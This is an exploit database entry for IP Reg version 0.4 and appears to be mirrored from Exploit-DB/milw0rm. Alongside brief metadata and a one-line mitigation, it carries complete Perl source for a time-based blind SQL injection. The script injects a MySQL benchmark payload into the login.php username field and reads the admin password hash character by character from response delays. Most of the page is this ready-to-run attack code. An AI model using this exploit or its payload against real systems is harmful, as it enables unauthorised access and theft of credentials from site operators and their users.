IP Reg - exploit.company

vendor:

IP Reg

by:

StAkeR

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: IP Reg

Affected Version From: 0.4

Affected Version To: 0.4

Patch Exists: NO

Related CWE: N/A

CPE: a:ip_reg:ip_reg

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2008

IP Reg <= 0.4 Blind SQL Injection Exploit

IP Reg <= 0.4 is vulnerable to Blind SQL Injection. This exploit uses a benchmark method to extract the hash of the admin password. The exploit takes two arguments, the URL of the target and the user ID of the admin. The exploit then sends a request to the login.php page with a crafted SQL query. If the response time is greater than 3 seconds, it means that the query was successful and the character is appended to the hash. This process is repeated for all the characters of the hash.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

#!/usr/bin/perl 
# -----------------------------------------------
# IP Reg <= 0.4 Blind SQL Injection Exploit
# Discovered By StAkeR - StAkeR[at]hotmail[dot]it 
# Discovered On 03/10/2008 
# -----------------------------------------------
# Download http://sourceforge.net/projects/ipreg/
# -----------------------------------------------

use strict;
use LWP::UserAgent;

my @chars = (48..57, 97..102); 
my $start = undef;
my $stop  = undef;
my $hash  = undef;
my $substr = 1; 
my $http = new LWP::UserAgent;
my ($domain,$userid) = @ARGV;

usage() unless $domain =~ /^http:\/\/(.+?)$/i and $userid =~ /^[0-9]$/; 


sub send_request
{ 
  my $post = undef;
  my $host = $domain;
  my $param = shift @_ or die $!;
  
  $host .= "/login.php";
  $post = $http->post($host,[
                             user_name => $param,
                             user_pass => 'admin'
                            ]);
 
}


sub give_char
{
  my $send = undef;
  my ($charz,$uidz) = @_;
  
  $send = "' or (select if((ascii(substring".
          "(user_pass,$uidz,1))=$charz),".
          "benchmark(200000000,char(0)),".
          "0) from user where user_id=$userid)#";

  return $send;
}


for(0..32) 
{
  foreach my $set(@chars)
  {
    my $start = time();
    
    send_request(give_char($set,$substr));
    
    my $stop = time();
  
    if($stop - $start > 3)
    { 
      $hash .= chr($set);
      $substr++ and last;
    }
  }
}

sub usage
{
  print "[?] IP Reg <= 0.4 (login.php) Blind SQL Injection Exploit\n";
  print "[?] Exploit Coded By StAkeR - Benchmark Method\n";
  print "[?] Usage: perl $0 http://[host] [id]\n";
  exit;
}


if(defined $hash and $http->get($domain)->is_success)   
{
  print "[?] Hash: $hash\n";
  exit;
}
else
{
  print "[?] Exploit Failed!\n";
  exit;
}

# milw0rm.com [2008-10-03]